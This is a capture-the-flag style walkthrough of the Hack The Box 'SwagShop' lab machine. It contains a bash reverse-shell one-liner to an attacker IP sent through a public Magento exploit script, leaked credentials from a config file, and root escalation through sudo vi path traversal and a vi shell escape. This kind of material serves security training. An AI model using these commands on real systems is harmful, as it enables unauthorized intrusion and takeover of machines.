HTB | SwagShop
This is the Box on Hack The Box Linux Privilege Escalation 101 Track. Find the box here.
Skill Learned
Exploit modification
GTFObins
NMAP
IP: 10.10.10.140
nmap -sT -p- --min-rate 10000 10.10.10.140

nmap -sC -sV -p 22,80 10.10.10.140

Port 80
Let's visit port 80

dirsearch -u http://swagshop.htb/ -e php,html -x 403,404

while looking at the directories I found http://swagshop.htb/app/etc/local.xml
Which have root/admin credentials

not able to find any login page so I started fuzzing again.
dirsearch -u http://swagshop.htb/index.php/ -e php,html -x 403,404

found /index.php/admin

Foothold/shell
let's try to login with the credential we got earlier, it was not working on googling I found this exploit.
In the script change target to http://swagshop.htb/index.php
and run the script

let's try forme:forme
and we are in

A simple Google search found me this.
In the script change username, password and install_date and run the script

python 37811.py 'http://swagshop.htb/index.php/admin' "uname -a"

now we can try for reverse shell
python 37811.py 'http://swagshop.htb/index.php/admin' "bash -c 'exec bash -i>& /dev/tcp/10.10.14.6/1234 0>&1'"

found the user.txt

Priv Esc
sudo -l

we can use /usr/bin/vi /var/www/html/*
without password
sudo /usr/bin/vi /var/www/html/../../../root/root.txt
and we can have root.txt

Now let's try for shell
GTFObin tells me how to get shell
sudo /usr/bin/vi /var/www/html/a
:set shell=/bin/sh
:shell

Last updated